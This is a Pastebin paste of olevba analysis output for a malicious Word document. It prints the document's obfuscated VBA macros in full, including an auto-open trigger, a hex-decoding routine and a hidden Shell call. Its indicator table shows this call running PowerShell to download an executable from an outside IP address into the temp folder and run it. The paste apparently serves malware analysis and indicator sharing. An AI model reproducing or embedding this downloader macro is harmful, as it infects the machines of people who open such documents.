SHARE
TWEET

Malicious Word macro

dynamoo Mar 18th, 2015 284 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. XML:MASIH-- 11idj325.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 11idj325.doc
  10. Type: Word2003_XML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: editdata.mso - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
  16. ÐÎïøÏÃØÀÏÃØâûà
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO ûâàûÀÀâûà.bas
  27. in file: editdata.mso - OLE stream: u'VBA/\u044b\u0432\u0430\u044b\u0410\u0410\u0432\u044b\u0430'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29. Dim AxygGoRiTOkuqRQaIahCglVBhig86 As Integer
  30. Dim FWdUfyGGTWdgWNsQRofoGrsRaht53 As String
  31. Dim wpimAVKbJvgEKauDoRaItiZPmpJ71 As Boolean
  32. Dim krptyASMRGdXptpQpfAbOADHKLl37 As Double
  33. Dim mcxcyBVDWKBtCDxcMehDZOMLHdw35 As Byte
  34. Dim DfANDuTzoOLJgtnkAorYuhycBLh99 As Long
  35. Dim MYRulblLodGLYHRflePvqhJHhaa46 As Currency
  36. Dim YOjzcfRRuAoNTijUYngLCKOHXOo29 As Single
  37. Dim UsSXXrkKuQMefbwdYSCyKWoczNp12 As Integer
  38. Dim oawaFertGZiAGCtnnawpJqRYMpw65 As String
  39. Dim GcUASXZrTtVjZkjjRlCwPuQquYy45 As Boolean
  40. Dim ehWjDoUlowIphYRzymKOrWknVvk71 As Double
  41. Dim tHbwbUfnrcpLLIiZhowOAWgzGlk97 As Byte
  42. Dim GRGeZctPigHtTqvocYRVXWWHkiW63 As Long
  43. Dim WtoXLJgHDJAIFgKMFvBREDxYnKE49 As Currency
  44. Dim PPVTHAdPXpZsgnUWZedQTSJqZLL25 As Single
  45. Dim qkbMHYZqOLIZHdmyojeOVPXlxXw86 As Integer
  46. Dim kbRlINXrSUDZYsvpZoIJfjEhIeL41 As String
  47. Dim OICjFilTZsfJkIKPufsipoOFGdB36 As Boolean
  48. Dim gccpseUHWEPovokuiUEJlhPsNdL63 As Double
  49. Dim aQoQtHfbJUXkNdelKuoWMsTUQWg28 As Byte
  50. Dim jKLDiaSjgwltBjDHbovgTZcoYYr86 As Long
  51. Dim itmeYPMBWNFuycgqjDXBhjVMOro92 As Currency
  52. Dim EeRuEFbncgUdMsbrRWhpIYTdezO45 As Single
  53.  
  54. Public Function ÈÎèîðÌÎËûâ(ByVal PDZOFTeMMzmMjw As String) As String
  55. Dim YkhbmjHCwjGfDADLJCDjxAzOCAK34, IiJADFAaDZrNiUgiPfKlZRRjwVS68 As Integer
  56. IiJADFAaDZrNiUgiPfKlZRRjwVS68 = 2164
  57. For YkhbmjHCwjGfDADLJCDjxAzOCAK34 = 0 To 35
  58. IiJADFAaDZrNiUgiPfKlZRRjwVS68 = IiJADFAaDZrNiUgiPfKlZRRjwVS68 + YkhbmjHCwjGfDADLJCDjxAzOCAK34
  59. DoEvents
  60. Next YkhbmjHCwjGfDADLJCDjxAzOCAK34
  61.  
  62. Dim hYlCzZmShpxesNYFktdcasEAVty15, wxOFaXIGlXMIqoVdjbqthiQvFjI13 As Integer
  63. wxOFaXIGlXMIqoVdjbqthiQvFjI13 = 5447
  64. For hYlCzZmShpxesNYFktdcasEAVty15 = 0 To 36
  65. wxOFaXIGlXMIqoVdjbqthiQvFjI13 = wxOFaXIGlXMIqoVdjbqthiQvFjI13 + hYlCzZmShpxesNYFktdcasEAVty15
  66. DoEvents
  67. Next hYlCzZmShpxesNYFktdcasEAVty15
  68.  
  69. Dim KIeMXoAYAtGBqiQgALSWLvhkjVw15, lZShIiVKOjBvaVmcUOQjDcfqSOf83 As Integer
  70. lZShIiVKOjBvaVmcUOQjDcfqSOf83 = 7486
  71. For KIeMXoAYAtGBqiQgALSWLvhkjVw15 = 0 To 17
  72. lZShIiVKOjBvaVmcUOQjDcfqSOf83 = lZShIiVKOjBvaVmcUOQjDcfqSOf83 + KIeMXoAYAtGBqiQgALSWLvhkjVw15
  73. DoEvents
  74. Next KIeMXoAYAtGBqiQgALSWLvhkjVw15
  75.  
  76.  
  77. For GBfuNiAvl = 1 To Len(PDZOFTeMMzmMjw) Step 2
  78. rIvzZMKEQTqM = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(PDZOFTeMMzmMjw, GBfuNiAvl, 2)))
  79. rnyBQmn = rnyBQmn & rIvzZMKEQTqM
  80. Next GBfuNiAvl
  81. ÈÎèîðÌÎËûâ = rnyBQmn
  82. End Function
  83. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  84. ANALYSIS:
  85. +------------+---------+-----------------------------------------+
  86. | Type       | Keyword | Description                             |
  87. +------------+---------+-----------------------------------------+
  88. | Suspicious | Chr     | May attempt to obfuscate specific       |
  89. |            |         | strings                                 |
  90. +------------+---------+-----------------------------------------+
  91. -------------------------------------------------------------------------------
  92. VBA MACRO êóåÀàïûâà.bas
  93. in file: editdata.mso - OLE stream: u'VBA/\u043a\u0443\u0435\u0410\u0430\u043f\u044b\u0432\u0430'
  94. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  95.  
  96.    
  97.    
  98.  
  99. Sub ÐÎïøÏÃØÀÏÃØâûà()
  100. øÈÐîìðîûâàÀ = ÈÎèîðÌÎËûâ(StrReverse("B3568756E2643746834783947455965786C55205D454455202472716473702B3568756E2643746834783947455965786C55205D454455202261636E2643746834783947455965786C55205D45445520246E61607875602B39272261636E2643746834783947455965786C55205D454455272C272568756E256B6168637F297A7F6F6D637F2434323E28323E21333E2637313F2F2A307474786728256C696644616F6C6E677F644E29247E65696C634265675E24756E4E2D6564737973502473656A626F4D27756E4820256C69666F62707F6E6D20237371607972602973696C6F605E6F696475736568754D202568756E2C6C6568637275677F60702B4F20246D636"))
  101.      ãíÃÏÎûâàà = Shell(øÈÐîìðîûâàÀ, 0)
  102. End Sub
  103.  
  104.  
  105. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  106. ANALYSIS:
  107. +------------+----------------------+-----------------------------------------+
  108. | Type       | Keyword              | Description                             |
  109. +------------+----------------------+-----------------------------------------+
  110. | Suspicious | Shell                | May run an executable file or a system  |
  111. |            |                      | command                                 |
  112. | Suspicious | StrReverse           | May attempt to obfuscate specific       |
  113. |            |                      | strings                                 |
  114. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  115. |            |                      | be used to obfuscate strings (option    |
  116. |            |                      | --decode to see all)                    |
  117. | IOC        | http://176.31.28.244 | URL (obfuscation: StrReverse+Hex)       |
  118. |            | /smoozy/shake.exe',' |                                         |
  119. |            | %TEMP%\huiUGI8t8dsF. |                                         |
  120. |            | cab'                 |                                         |
  121. | IOC        | 176.31.28.244        | IPv4 address (obfuscation:              |
  122. |            |                      | StrReverse+Hex)                         |
  123. | IOC        | powershell.exe       | Executable file name (obfuscation:      |
  124. |            |                      | StrReverse+Hex)                         |
  125. | IOC        | shake.exe            | Executable file name (obfuscation:      |
  126. |            |                      | StrReverse+Hex)                         |
  127. | IOC        | huiUGI8t8dsF.exe     | Executable file name (obfuscation:      |
  128. |            |                      | StrReverse+Hex)                         |
  129. +------------+----------------------+-----------------------------------------+
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top